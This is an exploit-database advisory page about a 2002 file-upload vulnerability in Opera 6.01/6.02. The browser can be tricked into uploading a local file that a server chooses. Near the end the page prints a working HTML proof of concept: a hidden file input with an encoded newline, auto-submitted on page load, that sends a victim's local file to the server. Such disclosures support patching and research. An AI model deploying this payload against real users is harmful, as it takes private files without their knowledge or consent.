header-logo
Suggest Exploit
vendor:
Opera
by:
SecurityFocus
7.5
CVSS
HIGH
File Upload Vulnerability
264
CWE
Product Name: Opera
Affected Version From: 06.01
Affected Version To: 06.02
Patch Exists: NO
Related CWE: N/A
CPE: opera:6.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Opera 6.01/6.02 File Upload Vulnerability

A vulnerability has been reported in Opera 6.01/6.02. The vulnerability is related to handling of the 'file' HTML input-type. It is possible for a server to set the file value, while fooling Opera into thinking no file has been specified. This is possible if the filename is appended with the string "
". This HTML-encoded newline character will cause the browser to believe that no value has been set. Consequently, the form will be submitted and the specified file will be uploaded to the server. This may occur without knowledge or consent of the victim user. Exploitation of this vulnerability allows for malicious webmasters to obtain arbitrary files from client systems.

Mitigation:

Ensure that the server-side application validates the file name before accepting the file.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4834/info

A vulnerability has been reported in Opera 6.01/6.02. The vulnerability is related to handling of the 'file' HTML input-type. It is possible for a server to set the file value, while fooling Opera into thinking no file has been specified. This is possible if the filename is appended with the string "
". This HTML-encoded newline character will cause the browser to believe that no value has been set. Consequently, the form will be submitted and the specified file will be uploaded to the server. This may occur without knowledge or consent of the victim user.

Exploitation of this vulnerability allows for malicious webmasters to obtain arbitrary files from client systems. 

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:\test.txt&#10;"
style="visibility:hidden">
</form>
</body>

Navigation

Suggest Exploit

Services By CQR